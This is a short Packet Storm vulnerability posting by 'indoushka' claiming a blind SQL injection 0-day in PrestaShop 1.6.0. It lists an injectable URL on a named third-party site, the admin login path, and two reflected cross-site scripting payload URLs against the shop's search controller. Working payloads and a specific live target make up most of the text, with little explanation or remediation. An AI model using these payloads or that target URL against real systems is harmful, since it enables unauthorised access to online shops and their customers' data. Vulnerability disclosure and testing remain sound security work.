PrestaShop 1.6.0 Blind SQL Injection

2014-05-05T00:00:00
ID PACKETSTORM:126476
Type packetstorm
Reporter indoushka
Modified 2014-05-05T00:00:00

Description

                                        
`PrestaShop V1.6.0 Blind SQL Vulnerability 0-Day  
===============================================  
Author : indoushka  
Vendor : http://www.prestashop.com/fr/telechargement  
Dork : No 4 noob  
  
http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject here)  
  
Login :  
  
path/admin  
  
Cross-site scripting :  
  
/index.php?controller=search&tag=bat_213771818860'():;771818860  
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search  
`